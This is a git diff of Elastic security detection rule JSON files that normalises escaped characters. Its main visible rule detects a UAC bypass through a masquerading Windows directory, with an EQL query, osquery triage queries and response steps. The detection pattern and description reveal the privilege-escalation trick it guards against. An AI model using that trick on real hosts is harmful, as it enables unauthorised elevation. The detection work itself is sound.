ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json index de3d0c9a47f..6cc757d9fcb 100644 --- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json index ba519b952e9..0a8063559bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json +++ b/packages/security_detection_engine/kibana/security_rule/28d39238-0c01-420a-b77a-24e5a7378663_4.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json index d4c0c044d03..45200d5f316 100644 --- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json +++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json index 5c47f4cfb49..695e73250ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json +++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_103.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json index 5f3fb9b8425..1584a215ce4 100644 --- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json +++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json index 939f66def08..8f23ed08f07 100644 --- a/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json +++ b/packages/security_detection_engine/kibana/security_rule/29052c19-ff3e-42fd-8363-7be14d7c5469_205.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -73,7 +73,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json index 25065456869..4390a98c022 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json index 1102adb0f33..a5674527868 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json index dcea0d72adc..2360d48acf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json +++ b/packages/security_detection_engine/kibana/security_rule/290aca65-e94d-403b-ba0f-62f320e63f51_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows directory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or 